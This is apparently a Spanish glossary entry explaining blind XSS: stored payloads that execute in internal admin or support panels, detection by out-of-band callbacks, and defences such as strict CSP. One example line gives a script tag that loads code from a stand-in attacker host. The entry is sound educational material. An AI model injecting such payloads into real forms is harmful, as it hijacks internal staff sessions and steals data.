XSS Ciego
¿Qué es XSS Ciego?
XSS CiegoVariante de XSS almacenado en la que el payload se ejecuta en un contexto que el atacante no ve, típicamente un panel administrativo interno.
El XSS ciego es una subclase del XSS almacenado en la que el script malicioso no se ejecuta en el navegador del atacante, sino en un contexto distinto y normalmente privilegiado: la vista de un ticket de soporte, una consola de revisión de fraude, un panel interno o un informe de respaldo. El atacante envía la carga mediante un formulario público (contacto, registro, soporte) y espera a que un usuario interno renderice los datos. La detección depende de retrollamadas fuera de banda: el payload exfiltra información a herramientas como XSS Hunter, Burp Collaborator o un servidor DNS/HTTP propio. Las defensas son las del XSS almacenado más una CSP estricta en herramientas internas.
● Ejemplos
- 01
Un campo de formulario de soporte con <script src=https://x.atacante/x.js></script> que se ejecuta en el CRM del agente.
- 02
Una cabecera User-Agent registrada en un visor de logs administrativo que no codifica HTML.
● Preguntas frecuentes
¿Qué es XSS Ciego?
Variante de XSS almacenado en la que el payload se ejecuta en un contexto que el atacante no ve, típicamente un panel administrativo interno. Pertenece a la categoría de Ataques y amenazas en ciberseguridad.
¿Qué significa XSS Ciego?
Variante de XSS almacenado en la que el payload se ejecuta en un contexto que el atacante no ve, típicamente un panel administrativo interno.
¿Cómo funciona XSS Ciego?
El XSS ciego es una subclase del XSS almacenado en la que el script malicioso no se ejecuta en el navegador del atacante, sino en un contexto distinto y normalmente privilegiado: la vista de un ticket de soporte, una consola de revisión de fraude, un panel interno o un informe de respaldo. El atacante envía la carga mediante un formulario público (contacto, registro, soporte) y espera a que un usuario interno renderice los datos. La detección depende de retrollamadas fuera de banda: el payload exfiltra información a herramientas como XSS Hunter, Burp Collaborator o un servidor DNS/HTTP propio. Las defensas son las del XSS almacenado más una CSP estricta en herramientas internas.
¿Cómo defenderse de XSS Ciego?
Las defensas contra XSS Ciego combinan habitualmente controles técnicos y prácticas operativas, como se detalla en la definición.
¿Cuáles son otros nombres para XSS Ciego?
Nombres alternativos comunes: XSS fuera de banda.
● Términos relacionados
- attacks№ 240
Cross-Site Scripting (XSS)
Vulnerabilidad web que permite a un atacante inyectar scripts maliciosos en páginas vistas por otros usuarios, ejecutándose en el navegador de la víctima bajo el origen del sitio.
- attacks№ 1107
XSS Almacenado
Vulnerabilidad de scripting entre sitios persistente: el script del atacante se guarda en el servidor y se ejecuta en el navegador de cada visitante.
- attacks№ 912
XSS Reflejado
XSS no persistente en el que una entrada controlada por el atacante se refleja inmediatamente en la respuesta y se ejecuta en el navegador de la víctima.
- attacks№ 347
XSS Basado en DOM
Variante de XSS donde la inyección y la ejecución ocurren totalmente en el navegador porque JavaScript del cliente escribe datos no confiables en un sink sin sanear.
- appsec№ 214
Política de Seguridad de Contenidos (CSP)
Cabecera HTTP que indica al navegador qué orígenes de scripts, estilos, marcos y otros recursos están permitidos, limitando el impacto de XSS y de inyecciones de datos.
- appsec№ 773
Codificación de salida
Transformar datos no confiables a un formato seguro para un contexto específico (HTML, JavaScript, URL, SQL, shell) para que no escapen y se ejecuten como código.